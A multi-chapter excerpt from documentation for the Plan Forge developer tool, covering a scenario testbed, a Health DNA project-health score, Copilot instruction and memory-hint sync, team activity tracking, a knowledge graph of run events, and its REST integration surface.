Artifact	Path	Purpose
Instruction file	`.github/instructions/blazor-fluent-ui.instructions.md`	Auto-loads on `*.razor` edits. Forbids `DbContext` in components, mandates code-behind split, lifecycle discipline, accessibility checklist.
Reviewer agent	`.github/agents/blazor-reviewer.agent.md`	Read-only audit of UI changes for layer violations, lifecycle bugs, and Fluent UI misuse.
Skill	`.github/skills/ui-scaffold/SKILL.md`	`/ui-scaffold <Entity> --crud` generates the page + DTO + service interface + bUnit test in one shot, enforcing the layering rules.

Why a UI demo? Backend slices are easy to make look impressive, they're terse, type-safe, and gates are straightforward. UI is where vibe-coding usually wins on speed and loses on quality. The Phase-2 UI plan exists to demonstrate that Plan-Forge produces UI you'd actually deploy: separation of concerns intact, no DbContext in .razor, every page accessible, every component tested.

Scenario Fixtures

Scenarios are JSON files under docs/plans/testbed-scenarios/. Each one describes:

Initial state, branch, commit, known-good baseline.
Instructions, the prompt / plan the agent will execute.
Expected artifacts, which files must change, which must not.
Gates, build, test, lint, drift thresholds.

A scenario is idempotent: the Testbed resets the fixture repo to the pinned commit before every run.

Anatomy of a Run

forge_testbed_run:

Acquires .forge/testbed.lock (one scenario at a time per testbed).
Verifies the testbed is clean (ERR_TESTBED_DIRTY if not).
Replays the scenario end-to-end in the testbed directory.
Captures artifacts, run metrics, and any defects.
Writes a finding JSON under docs/plans/testbed-findings/ and emits testbed-scenario-completed.
Releases the lock.

Common Errors

Code	Meaning	Recovery
`ERR_TESTBED_NOT_FOUND`	`testbed.path` missing or invalid	Set it in `.forge.json`
`ERR_TESTBED_DIRTY`	Uncommitted changes in the testbed	Commit or stash inside the testbed repo
`ERR_TESTBED_LOCKED`	Another scenario is running	Wait, or remove a stale `.forge/testbed.lock`

Feedback Into the Loop

Findings with defects feed two consumers:

Bug Registry, scanner-eligible defects auto-register via forge_bug_register.
Health DNA, run metrics (duration, gate failures, drift score) feed the daily Health DNA fingerprint.

Testbed ≠ CI. Your CI system runs against pull requests and masters the green/red light for merge. The Testbed runs against Plan Forge itself, under a library of synthetic scenarios, to ensure the pipeline still produces shippable code across upgrades.

Glowing golden DNA double-helix made of forge-glyphs (gauges, hammers, shields, gears) inside a translucent crystal vial, the Health DNA composite fingerprint

LiveGuard Health tab, composite health gauge, 30-day drift trend, MTTBF, and per-component metrics from forge_health_trend

Act IV, Learn · Chapter 25

Health DNA

A single fingerprint for "how healthy is this project today?", persisted, trended, compared.

New here? Plain-English version. A project can look fine on the surface and still be slowly rotting underneath. Tests are passing, but every plan run costs a little more. No incidents this week, but architectural drift is creeping up. Health DNA is a daily checkup that combines five different health signals into one score (0–100) so you can spot the slow decay before it becomes a crisis.

What it measures, drift, incidents, test pass rate, AI model success rate, and cost per slice. Five numbers, one composite score.
Why one number? Any single metric can lie (100% green tests + drowning in drift). The composite catches the lie.
What you do with it, the LiveGuard dashboard plots the score over time. A 7-day downward trend is the early warning to slow down and clean up before shipping more features.

Tool: forge_health_trend (LiveGuard), writes .forge/health-dna.jsonl. Intent: health-dna. Aliases: health-analysis, system-health, health-report.

Why a Fingerprint?

Any single metric can lie. A project with 100% green tests can still be drowning in drift. A low drift score can mask a CVE backlog. The Health DNA combines five independent signals into one daily fingerprint so slow decay, the kind where everything looks fine but tomorrow's plan costs 2× yesterday's, becomes visible.

The Five Signals

Figure 25-1. Health DNA composite scoring

Signal	Source	What it catches
Drift score	`forge_drift_report`	Architecture diverging from plan baseline
Incident rate	`forge_incident_capture`	Production failures over trailing window
Test pass rate	CI + testbed findings	Regression risk
Model success rate	Orchestrator telemetry	Agent failures + escalation frequency
Cost per slice	Cost ledger	Token-burn creep, the project getting harder to reason about

Record Shape

.forge/health-dna.jsonl, one record

{
  "timestamp": "2026-04-20T00:00:00Z",
  "driftScore":       0.91,
  "incidentRate7d":   0,
  "testPassRate":     0.998,
  "modelSuccessRate": 0.96,
  "costPerSlice":     0.34,
  "composite":        0.93,
  "delta7d":          -0.02,
  "delta30d":         -0.08
}

composite is a weighted blend computed inside forge_health_trend (current default weights: drift 0.30, incident-rate 0.25, test-pass 0.20, model-success 0.15, cost 0.10, see pforge-mcp/server.mjs). delta7d and delta30d compare against historical records, a small negative delta is noise, a sustained negative delta is decay.

Decay Detection

The watcher can alert on Health DNA thresholds:

delta7d < -0.10, short-term regression, usually tied to a specific slice.
delta30d < -0.15, long-term decay, usually architectural.
composite < 0.60, absolute floor; blocks new executions until addressed.

Dashboard

The LiveGuard dashboard's Health tab renders the composite score as a sparkline, with per-signal sub-lines toggleable. The Forge Intelligence page cross-references Health DNA with the OpenBrain memory corpus, "your drift score dropped the day you added the new caching layer" is exactly the kind of conclusion the Learn station exists to surface.

Why JSONL, not JSON? Health DNA is append-only by design, every run writes one line. The file rotates on size (rather than via a built-in trim tool). That way a rolled-back slice doesn't also roll back the memory of how sick the project was before the rollback.

Three interlocking bronze rings labeled INSTRUCTIONS, MEMORIES, and SKILLS hovering above a glowing forge anvil with amber sparks orbiting where the rings overlap

Chapter 26 · Act V, Integrate

The Copilot Integration Trilogy

How Plan Forge teaches GitHub Copilot about your project, three tools, two generated files, one dashboard tab, zero manual setup after the first run.

Part V is integration material, not sequential lessons. These four chapters (Copilot Integration, Team Coordination, Knowledge Graph, Integrating from Outside) each declare their own prerequisites in the lede, read them in whatever order matches the integration you're doing. The expected baseline across Part V is Parts I–IV: you've shipped at least one plan, you know what Crucible (Ch 5), Bug Registry (Ch 21), and Memory (Ch 24–25) are, and you've poked the Dashboard (Ch 7) at least once.

The Copilot integration trilogy. Three components: forge_sync_memories, forge_sync_instructions, and the Settings → Copilot dashboard tab. Together they make every new Copilot conversation start with full project context, no manual context-paste, no copy-and-rebuild instruction files.

Why a trilogy?

GitHub Copilot reads two files automatically when you open a workspace:

.github/copilot-instructions.md, "what you must always know about this project". Architectural rules, naming conventions, build commands, security commitments.
.github/copilot-memory-hints.md, "what we've learned from doing this work". Trajectories from prior plans, recurring patterns, auto-skills extracted from successful slices.

Both files exist before Plan Forge, you can hand-author them. But hand-authoring means: (a) they go stale the moment you ship the next plan, (b) every team member writes a slightly different one, and (c) when the underlying decisions change in .forge.json or PROJECT-PRINCIPLES.md, nothing reminds you to regenerate.

The trilogy solves all three problems by making both files build outputs, not human-authored sources:

Tool	Writes	Reads from	Run when
`forge_sync_instructions`	`.github/copilot-instructions.md`	project profile, principles, extra `.instructions.md` files, `.forge.json`	Architectural rules change
`forge_sync_memories`	`.github/copilot-memory-hints.md`	trajectories (`.forge/trajectories/`), auto-skills, brain entries	After each plan ships
Settings → Copilot tab	— (preview + apply both above)	live state from the two tools	Anytime you want to inspect before applying

One-liner: forge_sync_instructions handles the "always true" facts; forge_sync_memories handles the "we learned this last week" facts. The dashboard tab handles "let me look before I commit".

The data flow

Figure 26-1. Copilot Integration Trilogy, three sources, three tools, three artifacts

Both tools are idempotent and additive. They use content-hash deduplication, so running the same sync twice in a row produces zero file changes. They also use atomic write (temp file + rename), so a crash mid-write never leaves a half-baked file.

`forge_sync_instructions` — the "always true" file

forge_sync_instructions generates .github/copilot-instructions.md by composing four sources, in this order:

Project Profile (docs/plans/PROJECT-PROFILE.md), the tech stack, build commands, key paths. Generated once via the project-profile.prompt.md in Session 1.
Project Principles (docs/plans/PROJECT-PRINCIPLES.md), non-negotiable architectural and engineering commitments. Generated via project-principles.prompt.md.
Extra instruction files (.github/instructions/*.instructions.md), auto-loaded by Copilot via their applyTo frontmatter. The trilogy stitches the relevant ones into the master file so Copilot sees them as a single context.
.forge.json commitments, tech choices that the project has locked in (e.g. "database": "postgres", "frontend": "react").

The output is a single Markdown file ~150–400 lines (depends on profile complexity) with a deterministic structure: Identity → Stack → Build commands → Architectural rules → Forbidden patterns → Cost guardrails → Talking to Plan Forge tools.

Running it

Terminal · CLI

# Generate (preview only, does not write)
pforge sync-instructions --preview

# Generate and write
pforge sync-instructions

# Force overwrite even if file is identical (skips hash check)
pforge sync-instructions --force

From an agent · MCP

forge_sync_instructions({ preview: true })
// → { ok: true, written: false, diff: "...", contentHash: "sha256:..." }

forge_sync_instructions({ preview: false })
// → { ok: true, written: true, path: ".github/copilot-instructions.md", contentHash: "..." }

What the output looks like

The generated file follows a canonical template so that Copilot Chat's prompt-injection logic finds the same anchors every time:

# Instructions for Copilot

> **Project**: <name>
> **Stack**: <stack summary>
> **Generated by**: forge_sync_instructions @ v3.x

## Architecture Principles
<merged from architecture-principles.instructions.md + project-principles>

## Project Overview
<merged from PROJECT-PROFILE.md>

## Quick Commands
<merged from project profile + .forge.json>

## Coding Standards
<stack-specific from instructions/>

## Planning & Execution
<pipeline + prompts overview>

## Cost Estimates
<always-included; mandates forge_estimate_quorum>

## Talking to Forge-Master
<always-included; mandates forge_master_ask for open-ended reasoning>

`forge_sync_memories` — the "we learned this" file

forge_sync_memories generates .github/copilot-memory-hints.md by harvesting three runtime sources:

Trajectories (.forge/trajectories/*.jsonl), per-slice notes the worker left for itself: "I tried X, it failed because Y, so I switched to Z". These are the gold for "don't repeat this mistake" guidance.
Auto-skills (.forge/auto-skills/*.md), reusable patterns extracted by the Inner Loop. If three slices all needed the same shape of repository test, the fourth slice gets it for free as a skill, and Copilot Chat should know it exists too.
OpenBrain entries (L3, if configured), long-form lessons captured via forge_memory_capture or auto-stamped by tools like forge_run_plan.

Each source is filtered, hashed, deduped, and ranked by recency × signal strength. The output is bounded to ~80–120 lines so Copilot's context budget stays healthy.

Soft-sync, not hard-sync. The file is additive, the tool never deletes a hint a human added by hand. If you write a custom block under  /  markers, the sync tool preserves it verbatim. Only the  region is regenerated.

Running it

Terminal · CLI

# After every plan ships
pforge sync-memories

# Limit to last N trajectories (default: 50)
pforge sync-memories --since=14d

# Verbose: show which entries were included/excluded and why
pforge sync-memories --explain

What the output looks like

# Copilot Memory Hints

> **Generated by**: forge_sync_memories @ v3.x
> **Last sync**: 2026-05-17T14:22:11Z · 47 trajectories, 12 auto-skills, 8 brain entries

<!-- pforge:auto -->

## Recently learned patterns
- **Snapshot pop** uses `git stash apply` + explicit drop, not blind `git stash pop` (lesson from #201)
- **Vitest output parser** ignores subagent hallucination markers (lesson from #198)
- ...

## Auto-skills available
- `repository-vitest-pattern`, generated 2026-05-12 from 4 slices
- `bicep-rbac-scaffold`, generated 2026-05-10 from 3 slices

<!-- /pforge:auto -->

<!-- pforge:custom -->
<!-- Anything you write here is preserved across syncs -->
<!-- /pforge:custom -->

The Settings → Copilot dashboard tab

If you'd rather see the diff before it lands, open the dashboard and navigate to Settings → Copilot. The tab gives you four panels:

Panel	Shows	Actions
Current file	Live content of `.github/copilot-instructions.md`	Read-only viewer with syntax highlighting
Preview regenerated	What `forge_sync_instructions` would write right now	Inline diff vs the current file
Memory hints	Live content of `copilot-memory-hints.md` + count of entries by source	"Regenerate now" button → calls `forge_sync_memories`
Apply	Confirmation banner with the hash of what's about to be written	"Sync instructions" / "Sync memories" / "Sync both" buttons

Backed by three REST endpoints (full reference: Appendix W — Copilot integration):

GET  /api/copilot-instructions         # read current file
POST /api/copilot-instructions/preview # generate without writing
POST /api/copilot-instructions/sync    # generate + write atomically

When to run what

Event	Run	Why
Initial project setup	`sync-instructions`	Bootstraps Copilot with stack + commands
After edits to `PROJECT-PROFILE.md` or `PROJECT-PRINCIPLES.md`	`sync-instructions`	Architectural facts changed
After a plan ships	`sync-memories`	New trajectories, possibly new auto-skills
Weekly maintenance	Both	Catch drift; safe even if nothing changed (hash dedup skips no-op writes)
CI on `main` push	Both, with `--preview` + fail-on-diff	Catches "developer forgot to sync after editing PRINCIPLES"

Automation pattern: wire pforge sync-memories into the PostSlice hook (already shipped in templates/.github/hooks/PostSlice.md). Every successful slice now feeds the next Copilot conversation. Zero manual upkeep.

Capability summary

For the full tool-by-tool reference, see docs/capabilities.md on GitHub. The three trilogy surfaces, at a glance:

Surface	MCP tool	CLI	REST	Since
Memory hints	`forge_sync_memories`	`pforge sync-memories`	— (CLI-only)	v2.99
Instructions	`forge_sync_instructions`	`pforge sync-instructions`	`POST /api/copilot-instructions/sync`	v3.0
Dashboard tab	— (UI)	— (UI)	`GET /api/copilot-instructions` `POST /api/copilot-instructions/preview`	v3.1

See also: Chapter 22 — How the Shop Remembers for the full L1/L2/L3 memory architecture this trilogy sits on top of. Dashboard — Settings for the full Settings tab walkthrough. Chapter 9 — Customization for how to add your own custom blocks to the generated files.

A vast bronze great hall with five forges arranged in a semicircle, each tended by a hooded smith with a glowing rune overhead, threads of amber light connecting their anvils into a knowledge-sharing web

Chapter 27 · Act V, Integrate

Team Coordination

Two developers running Plan Forge on the same repo at the same time hit three predictable problems: concurrent edits collide at merge time, hard-won fixes stay trapped in one developer's local .forge/, and a productive day turns every reviewer into a bottleneck. This chapter shows how Plan Forge solves all three with a single shared file and a few GitHub API calls, no SaaS backend, no shared database, no new identity system.

How it's built (v2.93 → v3.4). Five surfaces compose the team layer: forge_team_dashboard + forge_team_activity (per-developer visibility), forge_github_metrics + forge_github_status (PR throughput + validation stack), forge_delegate_review (dispatching review to Copilot's cloud agent), and forge_classifier_issue (closing the tempering audit loop by filing a GitHub issue when a classifier rule needs to land).

The "shared shop" problem

The three coordination problems in detail:

Concurrent edits. Both might pick the same plan, or pick plans whose Scope Contracts touch the same files. Without visibility, you discover the conflict at merge time.
Lost institutional memory. Alice solves a tricky gate-portability issue on Monday. Bob hits the same issue on Wednesday because Alice's trajectory lives in her local .forge/.
Review fatigue. Plan Forge runs are productive, a single afternoon can ship 4 plans. If every plan needs a human reviewer, the bottleneck moves from "writing code" to "reviewing code".

v3.x addresses each, in order: team dashboard for visibility, shared activity ledger + memory sync for institutional memory, delegated review for the review bottleneck.

The activity ledger

Everything starts with one file: .forge/team-activity.jsonl. It is an append-only JSON Lines log that every Plan Forge operation writes to. One event per line, never edited, never compacted.

Figure 27-1. Team coordination, many writers, one ledger, four readers

{"ts":"2026-05-17T09:14:22Z","actor":"alice@example.com","action":"plan.start","plan":"Phase-31","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:18:41Z","actor":"alice@example.com","action":"slice.commit","plan":"Phase-31","slice":"2","sha":"e4f5g6h"}
{"ts":"2026-05-17T09:31:02Z","actor":"bob@example.com","action":"plan.start","plan":"Phase-32","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:33:11Z","actor":"alice@example.com","action":"plan.complete","plan":"Phase-31","slices":6,"costUsd":2.41}

The file is small (typical: 50–200 KB per team-week), git-friendly (line-stable), and trivially indexable. Every team query in this chapter is a streaming read of this file.

Where it lives. By default, .forge/team-activity.jsonl is not gitignored, that's the point. Commit it. The ledger is most useful when every developer's events land in one shared history. If you don't want it in git, set team.ledger.gitignore: true in .forge.json and use a side channel (S3, shared volume) instead.

`forge_team_dashboard` — per-developer cards

forge_team_dashboard reduces the ledger into one card per developer, capturing the last 7 days (default; configurable):

forge_team_dashboard({ windowDays: 7 })

// Response shape (excerpt):
{
  generatedAt: "2026-05-17T14:00:00Z",
  windowDays: 7,
  developers: [
    {
      actor: "alice@example.com",
      lastActive: "2026-05-17T09:33:11Z",
      runs: 12,
      successRate: 0.917,
      costUsd: 28.40,
      plans: ["Phase-31", "Phase-30", "Phase-29"],
      activePlan: null
    },
    {
      actor: "bob@example.com",
      lastActive: "2026-05-17T09:31:02Z",
      runs: 4,
      successRate: 1.0,
      costUsd: 6.12,
      plans: ["Phase-32"],
      activePlan: "Phase-32"      // currently running
    }
  ],
  totals: { runs: 16, successRate: 0.938, costUsd: 34.52 }
}

This is what backs the Team dashboard tab, one card per developer, sorted by recency, with a visual badge for "currently running a plan". The same shape powers the pforge team-dashboard CLI command for terminal users.

Above the cards, the dashboard renders a conflict-risk banner computed from the active plans of any two developers running simultaneously. The risk score is derived from Scope Contract overlap:

Score	Trigger	Banner
none	No active plans, or disjoint Scope Contracts	(hidden)
low	Active plans touch sibling files in the same directory	"Alice and Bob are both working in `src/orders/`, sync up before merge."
medium	Active plans share at least one file path	"⚠️ Alice and Bob are both editing `src/orders/repository.ts`."
high	Active plans share files AND share modified symbols (per `forge_diff`)	"🚨 High collision risk. One of you should pause."

`forge_team_activity` — querying the ledger

Where forge_team_dashboard aggregates, forge_team_activity queries. Pass any combination of filters:

forge_team_activity({
  actor:   "alice@example.com",   // optional, who
  plan:    "Phase-31",            // optional, what
  action:  "slice.commit",        // optional, kind
  since:   "2026-05-10T00:00:00Z",// optional, when
  limit:   100,                   // bounded; default 50, max 1000
  cursor:  null                   // pagination
})

// Response:
{
  events: [ /* event objects */ ],
  total: 47,
  hasMore: false,
  cursor: null
}

This is the tool to reach for when answering questions like "what did Alice work on last week?" or "show me every slice that Phase-31 took and who ran which retry". It is also the data source for the pforge team-activity CLI and the GET /api/team/activity REST endpoint.

`forge_github_metrics` + `forge_github_status`

The activity ledger captures everything that happens inside Plan Forge. forge_github_metrics and forge_github_status capture everything that happens around it: PR throughput, review latency, CI validation results.

`forge_github_metrics`

Pulls PR-level analytics from the GitHub API:

PRs opened / merged / closed in window
Time-to-first-review per PR (median + p95)
Time-to-merge per PR (median + p95)
Review iteration count distribution
Per-author breakdown matching the team ledger's actor identities

The dashboard's GH Metrics tab is a thin renderer over this tool's response.

`forge_github_status`

The validation stack on a single PR. Given a PR number, returns:

Required and optional checks with their current state
Review status (approved / changes-requested / pending) by reviewer
Mergeable state including conflicts
Branch protection rule violations (if any)
Linked issues + their open/closed status

Composable pattern: chain forge_team_activity({ action: "plan.complete" }) → for each plan, find its PR → forge_github_status({ pr: N }). This gives you a single-pane view of "what shipped last week and what state is each PR in".

`forge_delegate_review` — dispatching to Copilot

Plan Forge's reviewer step (the Reviewer Gate) is independent, a fresh session reads the plan's Scope Contract and audits the diff. By default it runs locally. forge_delegate_review dispatches the same audit task to the GitHub Copilot cloud coding agent, so the review happens server-side and the result lands as a PR comment.

forge_delegate_review({
  pr: 247,
  plan: "docs/plans/Phase-31-PLAN.md",
  scope: "scope-contract",   // or "full-plan" | "diff-only"
  blockOn: "critical"        // file CHANGES_REQUESTED on critical findings
})

// Response:
{
  ok: true,
  jobId: "copilot-job-7f3a...",
  dispatched: "2026-05-17T14:22:11Z",
  pr: 247,
  estimatedCompletion: "2026-05-17T14:27:00Z"
}

Configuration lives under cloudAgentValidation in .forge.json:

{
  "cloudAgentValidation": {
    "enabled": true,
    "agent": "copilot",              // current option: copilot
    "trigger": "post-slice-commit",  // when to dispatch
    "blockOn": "critical",
    "timeoutMinutes": 15,
    "fallback": "local-reviewer"     // if cloud dispatch fails
  }
}

Why "delegate" and not "replace"? The local Reviewer Gate is faster and cheaper (your tokens, your machine). The cloud agent is asynchronous, shareable, and produces a PR comment that everyone on the team sees. Use the local reviewer in tight inner-loop iterations; use delegation when shipping for human-team review.

`forge_classifier_issue` — closing the audit loop

The tempering subsystem (Audit Loop chapter) audits classifier output and finds false-positive findings or missed-detection rules. Once tempering has confirmed a rule is needed, forge_classifier_issue files a structured GitHub issue against the rule repository so the rule lands in code, not in a side note.

forge_classifier_issue({
  classifier:  "audit",
  ruleId:      "audit-stub-detection",
  category:    "missed-detection",      // or "false-positive"
  evidence:    [ /* before/after finding pairs */ ],
  severity:    "high",
  rationale:   "Three sweeps in a row missed inline TODO markers in JSX comments."
})

// Response:
{
  ok: true,
  issueNumber: 312,
  issueUrl: "https://github.com/.../issues/312",
  deduped: false,
  hash: "sha256:..."
}

The tool deduplicates against open issues with the same rule + category hash within 14 days, so repeated audit findings don't spam the tracker. This is the official "self-repair" path for classifier rules, analogous to forge_meta_bug_file for plan/orchestrator/prompt defects.

Where to find this in the dashboard

Tab	Backed by	Surfaces
Team	`forge_team_dashboard`	Per-developer cards, conflict-risk banner, "currently running" badges
Team Activity	`forge_team_activity`	Timeline view of the ledger with filter chips
GH Metrics	`forge_github_metrics`	PR throughput, review latency, per-author breakdown
PR Status (drill from any PR link)	`forge_github_status`	Required checks, reviewers, mergeability

CLI summary

pforge team-dashboard              # per-developer cards in the terminal
pforge team-dashboard --json       # machine-readable
pforge team-activity --since=7d    # query the ledger
pforge team-activity --actor=alice@example.com --action=slice.commit
pforge gh-metrics --window=30d     # PR throughput
pforge gh-status --pr=247          # validation stack for one PR
pforge delegate-review --pr=247 --plan=docs/plans/Phase-31-PLAN.md

See also: The Audit Loop for how tempering produces the findings that forge_classifier_issue dispatches. Chapter 26 — The Copilot Integration Trilogy for how shared memory hints close the "Bob hits Alice's bug" gap. Chapter 7 — The Dashboard for the full tab tour.

A floating 3D constellation of glowing bronze nodes connected by amber light edges suspended in a stone forge chamber, with node clusters shaped like scrolls, hammers, vessels, and crossed wrenches representing Phase, Slice, Bug, and Commit nodes

Chapter 28 · Act V, Integrate

The Knowledge Graph

Plan Forge writes structured events on every action, slice starts, gate failures, commits, bug filings, cost samples. The knowledge graph stitches those events into a queryable graph, then runs four pattern detectors and a daily digest aggregator across it. The result: you find recurring failures before the failures find you.

Three components. forge_graph_query introduced the graph itself; forge_patterns_list added the four detectors; pforge digest ships the daily roll-up that surfaces the most actionable findings into the dashboard's Yesterday's Digest tile.

Why a graph?

Every Plan Forge subsystem already writes its own structured log: .forge/runs/*.jsonl, .forge/trajectories/*.jsonl, .forge/bugs/*.json, .forge/cost/*.json, .forge/team-activity.jsonl. Individually, each file answers one question, "what did this run cost?", "what bugs are open?". The interesting questions are cross-file:

"Which file gets touched most often by failing slices?"
"Which model has the highest failure rate on slices in the integration domain?"
"Has slice 4 of any plan ever shipped on the first try?"
"How does this week's cost-per-slice compare to last month's median?"

Answering any of these requires joining at least three logs. The knowledge graph builds an in-memory representation of those joins so the answer is a millisecond traversal, not a five-file grep.

The node + edge model

Knowledge graph schema with seven node types and four edge classes. Top tier (PLANNING HIERARCHY): one Phase node connects via 'contains' edges to three Slice nodes (31-1, 31-2, 31-3). Bottom tier (EXECUTION ARTIFACTS): five rectangular nodes, Run (cost, tokens, model), Commit (sha, author), File (path, churn), Bug (id, status), Incident (severity, mttr). Slices connect down via four edge types: solid gray for 'executed_by' and 'produced', amber for 'touched' (slice to file), pink for 'found' (slice to bug, bug to incident), and dashed green for 'fixed_by' (bug back to commit). Right panel lists the queries this schema unlocks: pattern detectors, churn-vs-cost, bug-to-file blast radius, phase-to-fix-time, pforge digest, forge_patterns_list, forge_hotspot, forge_graph_query. — Figure 28-1. Knowledge graph schema, seven node types, four edge classes

Seven node types: Phase, Slice, Commit, File, Run, Bug, CostSample. Six edge types. The whole graph for a year of plans on a medium-sized repo fits in <30 MB of memory and serializes to .forge/graph/snapshot.json in under a second.

The graph is derived, not authoritative. If snapshot.json is deleted, pforge graph rebuild recomputes it from the underlying logs. The logs are the source of truth; the graph is the index.

`forge_graph_query` — the query surface

Queries take a starting node selector and a traversal expression. The tool is intentionally not a general-purpose graph query language, it ships with a small, opinionated set of canned queries that answer the questions teams actually ask:

forge_graph_query({ query: "hot-files", windowDays: 30 })
// → files touched by the most failed slices in the last 30 days

forge_graph_query({ query: "bug-clusters", windowDays: 90 })
// → bugs grouped by shared file/symbol

forge_graph_query({ query: "model-leaderboard", domain: "integration" })
// → success rate per model on slices tagged with the integration domain

forge_graph_query({ query: "slice-history", slice: "4", windowDays: 180 })
// → every Phase that had a slice 4, with success/cost/duration

forge_graph_query({ query: "phase-roi", phase: "Phase-31" })
// → cost, duration, file churn, bugs raised, bugs closed for one phase

Custom traversals are also accepted via the lower-level traverse form (advanced):

forge_graph_query({
  start:   { type: "File", path: "src/orders/repository.ts" },
  follow:  ["touches<-Commit", "produced<-Slice", "raised->Bug"],
  filter:  { "Bug.status": "open" },
  return:  ["Bug.id", "Bug.title", "Slice.id", "Phase.id"],
  limit:   25
})

`forge_patterns_list` — the four detectors

forge_patterns_list runs four detector heuristics across the graph and returns ranked findings. Each detector is implemented as a deterministic graph traversal, no ML, no embeddings, just structural pattern matching.

Detector	Looks for	Signal
`gate-failure-recurrence`	Same gate failing across ≥3 slices in different plans within 30 days	"The validation is broken, not the code"
`model-failure-rate-by-complexity`	Models whose failure rate climbs steeply with slice complexity	"Use a flagship model for the hard slices, fast model for the easy ones"
`slice-flap-pattern`	Slices that succeed-then-fail-then-succeed on retry (non-monotonic outcomes)	"Flaky gate or non-deterministic test in this slice"
`cost-anomaly`	Runs whose cost-per-slice exceeds the 90-day median by ≥2.5×	"Token blow-up, investigate retry logic or context bloat"

Response shape

forge_patterns_list({ windowDays: 30, limit: 10 })

// Response:
{
  generatedAt: "2026-05-17T14:00:00Z",
  windowDays: 30,
  patterns: [
    {
      detector: "gate-failure-recurrence",
      severity: "high",
      title:    "Gate 'tsc --noEmit' failed in 5 slices across 3 plans",
      evidence: { slices: ["Phase-29:3", "Phase-30:1", "Phase-30:4", "Phase-31:2", "Phase-31:5"], commonError: "TS2307: Cannot find module ..." },
      suggestedAction: "Investigate tsconfig path mapping; consider widening gate or fixing build config."
    },
    {
      detector: "cost-anomaly",
      severity: "medium",
      title:    "Phase-31 cost/slice 3.1× over 90-day median",
      evidence: { phase: "Phase-31", medianUsd: 0.42, observedUsd: 1.31, primarySuspect: "long-context-retries" }
    }
    // ...
  ],
  total: 7
}

The Recurring Patterns dashboard panel is a thin renderer over this tool's output, sorted by severity descending. Each finding has a "Suppress for 7 days" button (the suppression list lives in .forge/patterns-suppressions.json, see Conventions for the format).

`pforge digest` — Yesterday's Digest

The graph and the detectors give you raw findings. pforge digest compresses them into a single human-readable summary intended to be the first thing you read each morning.

pforge digest
pforge digest --since=24h         # default
pforge digest --since=7d          # weekly roll-up
pforge digest --format=json       # machine-readable
pforge digest --post              # post to configured notification channel

A typical digest collects six categories of finding:

Plans shipped, count, total cost, success-rate-on-first-try
Aging meta-bugs, open self-repair issues older than 14 days
Stalled phases, plans started but no slice committed in 48 hours
Probe-lane deltas, model availability changes since yesterday (from forge_doctor_quorum)
Drift score changes, environment/config drift exceeding threshold (from forge_drift_report)
Cost anomalies, the top finding from the cost-anomaly detector

The Yesterday's Digest dashboard tile is the same content, rendered in HTML. The CLI form is useful in a daily Slack post or as the body of a forge_notify_send message.

Wire it into cron / GitHub Actions: pforge digest --post at 09:00 every weekday with a Slack notifier configured (notify-slack extension) gives a free daily standup grounded in actual run data, not vibes.

Where the data lives

Path	Purpose	Rebuildable
`.forge/graph/snapshot.json`	Serialized graph index	Yes, `pforge graph rebuild`
`.forge/patterns-suppressions.json`	User-suppressed pattern findings + expiry	No (state)
`.forge/digests/YYYY-MM-DD.json`	Cached daily digest output	Yes, `pforge digest --rebuild`
`.forge/runs/`, `.forge/trajectories/`, `.forge/bugs/`, `.forge/cost/`	Source logs (graph is derived from these)	Authoritative

CLI summary

pforge graph stats               # node/edge counts, last-rebuild timestamp
pforge graph rebuild             # full rebuild from logs
pforge graph query hot-files     # run a canned query
pforge patterns                  # list current findings from all four detectors
pforge patterns --since=7d
pforge digest                    # the morning summary
pforge digest --post             # send via configured notifier

See also: Chapter 22 — How the Shop Remembers for the L1/L2/L3 memory tiers the graph draws from. Chapter 27 — Team Coordination for the activity ledger that feeds the Phase/Slice/Run nodes. Chapter 25 — Health DNA for trend metrics that complement pattern findings.

A massive bronze gateway in a stone wall opening from a misty exterior into a brightly-lit forge interior, with four glowing amber paths labeled MCP, CLI, REST, and SDK converging toward the threshold and pouring their light into the forge beyond

Chapter 29 · Act V, Integrate

Integrating from Outside

MCP is the native transport for Copilot and similar agents, but it is not the only one. Plan Forge ships four orthogonal surfaces so any tool can drive the workshop: REST for HTTP-anything, SDK for Node.js callers, WebSocket hub for live event streams, and CLI for scripts and humans.

The big numbers. The integration surface is large by design, 102 MCP tools, 103 REST endpoints across 17+ domains, a 4-sub-path SDK (pforge-sdk, /tools, /hallmark, /chunker), and 97 CLI commands. The same underlying handlers back every surface, pick the one that fits the caller, not the feature.

The four surfaces, at a glance

Left-to-right integration surface map. Three clustered columns: Callers (Copilot/Agents, CI runners, Custom dashboards, Scripts/Humans), Surfaces (MCP Server over stdio plus websocket, REST API over HTTP/JSON, WebSocket Hub at /api/hub, CLI pforge), and Plan Forge Core (Tool handlers). Copilot routes through MCP to handlers, CI routes through REST to handlers, dashboards route through both REST and the WebSocket Hub to handlers, and scripts and humans route through the CLI to handlers, all four surfaces converging on the same shared handler set. — Figure 29-1. Integration surface map, MCP, REST, WebSocket Hub, and CLI all route to the same handlers.

The same handler set lives behind all four surfaces. Adding a new tool means the team writes one handler, and it automatically becomes available as MCP tool, REST endpoint, CLI command, and SDK export. This is intentional: the integration surface should never be the bottleneck for a new capability.

Figure 29-2. Surface decision tree, pick by caller, not by capability

REST API

The REST surface is the right choice for any caller that already speaks HTTP, GitHub Actions, GitLab CI, a Python script, a curl one-liner, a Postman collection. It is also the surface the dashboard itself uses.

Base URL and auth

# Local dev (default)
http://localhost:3100/api

# Auth: bearer token from .forge/secrets.json (key: "apiToken")
curl -H "Authorization: Bearer $PFORGE_API_TOKEN" \
     http://localhost:3100/api/plan/status

Tokens are generated by pforge auth issue and stored locally in .forge/secrets.json (gitignored). Multi-developer setups use one token per developer; CI uses a dedicated CI token with scoped permissions.

The 17+ domains

The 113 endpoints organize into 16 subsystems that mirror the MCP tool families. The full per-endpoint reference lives in Appendix W — REST API Reference; this chapter covers the shape:

Prefix	Backs	Sample endpoint
`/api/plan`	Plan execution + status	`POST /api/plan/run`
`/api/cost`	Cost reports + estimates	`GET /api/cost/report`
`/api/team`	Team dashboard + activity	`GET /api/team/dashboard`
`/api/copilot-instructions`	Copilot trilogy	`POST /api/copilot-instructions/sync`
`/api/graph`	Knowledge graph queries	`POST /api/graph/query`
`/api/liveguard`	Deploy safety surface	`POST /api/liveguard/run`
`/api/bugs`	Bug registry	`GET /api/bugs`
`/api/crucible`	Idea smelting	`POST /api/crucible/ask`
`/api/forge-master`	Read-only reasoning agent	`POST /api/forge-master/ask`
